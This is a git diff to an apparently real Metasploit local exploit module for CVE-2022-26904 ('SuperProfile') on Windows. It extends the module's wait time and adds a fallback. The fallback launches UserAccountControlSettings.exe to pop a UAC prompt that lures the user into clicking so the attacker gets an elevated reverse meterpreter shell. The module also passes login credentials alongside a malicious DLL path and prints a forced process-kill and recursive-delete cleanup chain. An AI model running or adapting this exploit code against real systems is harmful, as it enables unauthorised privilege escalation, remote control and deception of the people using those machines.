diff --git a/modules/exploits/windows/local/cve_2022_26904_superprofile.rb b/modules/exploits/windows/local/cve_2022_26904_superprofile.rb index 2b2aa095e7..82bd24c75b 100644 --- a/modules/exploits/windows/local/cve_2022_26904_superprofile.rb +++ b/modules/exploits/windows/local/cve_2022_26904_superprofile.rb @@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', - 'WfsDelay' => 30 + 'WfsDelay' => 300 }, 'AKA' => [ 'SuperProfile' ] } @@ -232,6 +232,7 @@ class MetasploitModule < Msf::Exploit::Local dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s + @session_obtained_bool = false # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation, and the credentials for the second user. execute_dll(library_path, dll_info_parameter) @@ -240,9 +241,23 @@ class MetasploitModule < Msf::Exploit::Local print_warning("Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:") print_warning('taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local') print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!') + + print_status("Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.") + print_status("If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.") + sleep(60) + if (@session_obtained_bool == false) + # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself + # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens. + begin + cmd_exec("UserAccountControlSettings.exe") + rescue Rex::TimeoutError + print_warning("Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!") + end + end end def on_new_session(new_session) + @session_obtained_bool = true old_session = @session @session = new_session if new_session.type == 'meterpreter'